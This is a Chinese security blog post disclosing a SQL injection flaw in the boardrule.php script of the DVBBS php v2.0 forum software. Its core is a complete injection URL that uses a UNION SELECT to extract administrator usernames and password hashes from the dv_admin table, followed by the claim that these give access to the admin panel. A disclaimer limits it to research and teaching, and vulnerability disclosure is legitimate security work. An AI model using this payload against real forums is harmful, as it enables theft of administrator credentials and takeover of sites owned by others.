DVBBS php v2.0 boardrule.php注入漏洞

首页 > 技术文章 > DVBBS php v2.0 boardrule.php注入漏洞

DVBBS php v2.0 boardrule.php注入漏洞

2009年9月4日 Chinadu 发表评论 108 views 阅读评论

DVBBS php v2.0 boardrule.php注入漏洞

影响版本:
DVBBS php v2.0漏洞描述:
PHP2.0＋＋功能介绍：
一、断点数据库备份，保持所备份的数据和论坛数据同步；
二、多种形式Url rewrite 伪静态，提高SEO；
三、多线程信息采集，减少人工操作繁琐度；
四、自动升级采用多线程断点续传PHP下载模块；
五、国际论坛界中独创了一个文件安装论坛；
六、创新、贴心的新发贴回贴模式正在启用---动网PHP2.0++再创佳绩；
七、发挥PHP优点，大量采用成熟的缓存机制
八、全优的后台搜索功能；
九、用户体验

boardrule.php存在sql注入漏洞。
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

boardrule.php?groupboardid=1/**/union /**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/

admin/index.php

进入后台即可了．．

2009年09月29日 -- 动网多个版本上传漏洞
2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞
2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
2006年10月28日 -- 动易2006 SP4版最新漏洞
2006年10月22日 -- 动易SP4的漏洞利用
2006年10月8日 -- JIMMY中文站留言簿漏洞利用
2012年02月10日 -- Xpath SQL Injection
2011年09月21日 -- WPA2不再安全无线加密协议曝惊天漏洞
2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability

分类: 技术文章标签: dvbbs, SQL Injection, 漏洞

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

让 Windows 开机自动拨号上网 Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability

Chinadu's Blog

DVBBS php v2.0 boardrule.php注入漏洞

相关文章

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives

2012 年二月
一	二	三	四	五	六	日
« 一
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29